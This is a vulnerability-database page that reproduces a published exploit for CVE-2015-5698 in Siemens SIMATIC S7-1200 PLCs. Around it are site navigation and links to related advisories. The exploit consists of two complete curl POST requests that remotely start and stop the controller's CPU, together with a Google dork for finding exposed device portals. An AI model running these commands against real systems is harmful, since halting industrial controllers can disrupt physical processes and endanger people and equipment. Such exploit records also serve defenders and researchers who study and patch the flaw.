Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormRoseSecurityPACKETSTORM:172315
HistoryMay 15, 2023 - 12:00 a.m.

Siemens SIMATIC S7-1200 Cross Site Request Forgery

2023-05-1500:00:00
RoseSecurity
packetstormsecurity.com
223
siemens
simatic s7-1200
cross site request forgery
exploit
rosesecurity
plc
vulnerability
command injection
cve-2015-5698
kali linux
security advisory

0.014 Low

EPSS

Percentile

86.2%

JSON
`# Exploit Title: Siemens SIMATIC S7-1200 CPU Start/Stop Command- Cross-Site Request Forgery  
# Google Dork: inurl:/Portal/Portal.mwsl  
# Date: 2022-03-24  
# Exploit Author: RoseSecurity  
# Vendor Homepage: https://www.siemens.com/global/en.html  
# Version: SIMATIC S7-1200 CPU family: All versions prior to V4.1.3  
# Tested on: Kali Linux  
# CVE: CVE-2015-5698  
  
  
  
# IP == PLC IP address  
  
# Start Command  
  
curl -i -s -k -X $'POST' \ -H $'Host: <IP>' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://<IP>' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http://<IP>/Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' \ -b $'siemens_automation_no_intro=TRUE' \ --data-binary $'Run=1&PriNav=Start' \ 'http://<IP>/CPUCommands'  
  
# Stop Command  
  
curl -i -s -k -X $'POST' \ -H $'Host: <IP>' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://<IP>' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http://<IP>/Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' \ -b $'siemens_automation_no_intro=TRUE' \ --data-binary $'Run=1&PriNav=Stop' \ 'http://<IP>/CPUCommands'  
`

Related

prion 1
ics 1
nvd 1
nessus 2
cvelist 1
cve 1
openvas 1
packetstorm 1
prion
prion
Cross site request forgery (csrf)
2015-08-30 14:59:00
ics
ics
Siemens SIMATIC S7-1200 CSRF Vulnerability
2018-08-27 12:00:00
nvd
nvd
CVE-2015-5698
2015-08-30 14:59:03
nessus
nessus
Siemens SIMATIC S7-1200 Cross-Site Request Forgery (CVE-2015-5698)
2022-02-07 00:00:00
Siemens Simatic Cross-Site Request Forgery (CSRF)
2019-11-08 00:00:00
cvelist
cvelist
CVE-2015-5698
2015-08-30 00:00:00
cve
cve
CVE-2015-5698
2015-08-30 14:59:03
openvas
openvas
Siemens SIMATIC S7-1200 CSRF Vulnerability (SSA-134003)
2015-09-09 00:00:00
packetstorm
packetstorm
Siemens SIMATIC S7-1200 CPU Cross Site Request Forgery
2018-05-22 00:00:00

0.014 Low

EPSS

Percentile

86.2%

JSON
Related for PACKETSTORM:172315
prion1ics1nvd1nessus2cvelist1cve1openvas1packetstorm1